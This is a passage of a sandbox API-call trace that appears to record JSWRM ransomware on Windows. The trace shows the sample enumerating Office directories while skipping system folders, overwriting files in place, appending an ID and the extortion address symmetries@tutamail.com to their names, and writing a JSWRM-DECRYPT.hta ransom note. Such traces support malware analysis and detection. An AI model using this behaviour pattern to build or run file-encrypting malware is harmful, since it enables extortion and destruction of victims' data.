cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Visio.x-none.msi.16_PostCommon.Visio.x-none.mcxml", lpUsedDefaultChar=0x0) returned 49 [0113.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0113.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0113.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Visio.x-none.msi.16_PostCommon.Visio.x-none.mcxml", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0113.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0113.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Visio.x-none.msi.16_PostCommon.Visio.x-none.mcxml", cchWideChar=49, lpMultiByteStr=0x20d920, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Visio.x-none.msi.16_PostCommon.Visio.x-none.mcxml", lpUsedDefaultChar=0x0) returned 49 [0113.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0113.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0113.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0113.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0113.493] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Visio.x-none.msi.16_PostCommon.Visio.x-none.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\visio.x-none.msi.16_postcommon.visio.x-none.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.494] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=314) returned 1 [0113.494] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x21be68 [0113.494] ReadFile (in: hFile=0x238, lpBuffer=0x21be68, nNumberOfBytesToRead=0x130, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x21be68*, lpNumberOfBytesRead=0x345e89c*=0x130, lpOverlapped=0x0) returned 1 [0113.495] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.495] WriteFile (in: hFile=0x238, lpBuffer=0x21be68*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x21be68*, lpNumberOfBytesWritten=0x345e898*=0x130, lpOverlapped=0x0) returned 1 [0113.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21be68 | out: hHeap=0x1e0000) returned 1 [0113.496] CloseHandle (hObject=0x238) returned 1 [0113.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0113.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0113.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0113.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0113.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0113.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0113.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0113.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0113.496] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Visio.x-none.msi.16_PostCommon.Visio.x-none.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\visio.x-none.msi.16_postcommon.visio.x-none.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Visio.x-none.msi.16_PostCommon.Visio.x-none.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\visio.x-none.msi.16_postcommon.visio.x-none.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0113.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0113.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0113.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0113.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0113.497] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x128ed2a1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x128ed2a1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x12985c4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17fba4, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="Word.x-none.msi.16_mondoww.mcxml", cAlternateFileName="WORDX-~1.MCX")) returned 1 [0113.497] lstrcmpiW (lpString1="Word.x-none.msi.16_mondoww.mcxml", lpString2=".") returned 1 [0113.497] lstrcmpiW (lpString1="Word.x-none.msi.16_mondoww.mcxml", lpString2="..") returned 1 [0113.497] lstrcmpiW (lpString1="Word.x-none.msi.16_mondoww.mcxml", lpString2="...") returned 1 [0113.497] lstrcmpiW (lpString1="Word.x-none.msi.16_mondoww.mcxml", lpString2="windows") returned 1 [0113.497] lstrcmpiW (lpString1="Word.x-none.msi.16_mondoww.mcxml", lpString2="recovery") returned 1 [0113.497] lstrcmpiW (lpString1="Word.x-none.msi.16_mondoww.mcxml", lpString2="perflogs") returned 1 [0113.497] lstrcmpiW (lpString1="Word.x-none.msi.16_mondoww.mcxml", lpString2="documents and settings") returned 1 [0113.497] lstrcmpiW (lpString1="Word.x-none.msi.16_mondoww.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.497] lstrcmpiW (lpString1="Word.x-none.msi.16_mondoww.mcxml", lpString2="system volume information") returned 1 [0113.497] lstrcmpiW (lpString1="Word.x-none.msi.16_mondoww.mcxml", lpString2="msocache") returned 1 [0113.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0113.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Word.x-none.msi.16_mondoww.mcxml", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0113.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Word.x-none.msi.16_mondoww.mcxml", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 32 [0113.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0113.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0113.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Word.x-none.msi.16_mondoww.mcxml", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0113.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Word.x-none.msi.16_mondoww.mcxml", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 32 [0113.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0113.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0113.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0113.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0113.498] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Word.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\word.x-none.msi.16_mondoww.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.499] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1571748) returned 1 [0113.499] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0113.499] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0113.512] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.512] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0113.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.512] CloseHandle (hObject=0x238) returned 1 [0113.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0113.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0113.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0113.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0113.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0113.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0113.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0113.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0113.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.513] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Word.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\word.x-none.msi.16_mondoww.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Word.x-none.msi.16_mondoww.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\word.x-none.msi.16_mondoww.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0113.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0113.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0113.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.514] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x128ed2a1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x128ed2a1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x12985c4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17fba4, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="Word.x-none.msi.16_mondoww.mcxml", cAlternateFileName="WORDX-~1.MCX")) returned 0 [0113.514] FindClose (in: hFindFile=0x231c40 | out: hFindFile=0x231c40) returned 1 [0113.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0113.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0113.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0113.514] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1164cbcb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3b9607ff, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b9607ff, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="x-none", cAlternateFileName="")) returned 0 [0113.514] FindClose (in: hFindFile=0x231f40 | out: hFindFile=0x231f40) returned 1 [0113.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0113.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0113.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0113.514] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3c29db74, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3c29db74, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Office16", cAlternateFileName="")) returned 1 [0113.514] lstrcmpiW (lpString1="Office16", lpString2=".") returned 1 [0113.514] lstrcmpiW (lpString1="Office16", lpString2="..") returned 1 [0113.514] lstrcmpiW (lpString1="Office16", lpString2="...") returned 1 [0113.514] lstrcmpiW (lpString1="Office16", lpString2="windows") returned -1 [0113.514] lstrcmpiW (lpString1="Office16", lpString2="recovery") returned -1 [0113.514] lstrcmpiW (lpString1="Office16", lpString2="perflogs") returned -1 [0113.514] lstrcmpiW (lpString1="Office16", lpString2="documents and settings") returned 1 [0113.515] lstrcmpiW (lpString1="Office16", lpString2="$RECYCLE.BIN") returned 1 [0113.515] lstrcmpiW (lpString1="Office16", lpString2="system volume information") returned -1 [0113.515] lstrcmpiW (lpString1="Office16", lpString2="msocache") returned 1 [0113.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0113.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x210158 [0113.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0113.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0113.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0113.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0113.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217f60 [0113.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0113.515] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\jswrm-decrypt.hta")) returned 0xffffffff [0113.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217f60 | out: hHeap=0x1e0000) returned 1 [0113.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0113.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x205850 [0113.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0113.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24c1d0 [0113.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0113.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0113.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217bf0 [0113.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0113.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0113.516] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.516] WriteFile (in: hFile=0x458, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0113.517] CloseHandle (hObject=0x458) returned 1 [0113.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217bf0 | out: hHeap=0x1e0000) returned 1 [0113.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0113.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0113.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0113.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0113.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0113.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217880 [0113.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0113.519] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\jswrm-decrypt.hta")) returned 0x20 [0113.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217880 | out: hHeap=0x1e0000) returned 1 [0113.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0113.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0113.519] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3c29db74, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3a527709, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName=".", cAlternateFileName="")) returned 0x232000 [0113.519] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0113.519] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3c29db74, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3a527709, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="..", cAlternateFileName="")) returned 1 [0113.526] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0113.526] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0113.526] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d9058b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b93a5c4, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b93a5c4, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="1033", cAlternateFileName="")) returned 1 [0113.526] lstrcmpiW (lpString1="1033", lpString2=".") returned 1 [0113.526] lstrcmpiW (lpString1="1033", lpString2="..") returned 1 [0113.526] lstrcmpiW (lpString1="1033", lpString2="...") returned 1 [0113.526] lstrcmpiW (lpString1="1033", lpString2="windows") returned -1 [0113.526] lstrcmpiW (lpString1="1033", lpString2="recovery") returned -1 [0113.526] lstrcmpiW (lpString1="1033", lpString2="perflogs") returned -1 [0113.526] lstrcmpiW (lpString1="1033", lpString2="documents and settings") returned -1 [0113.526] lstrcmpiW 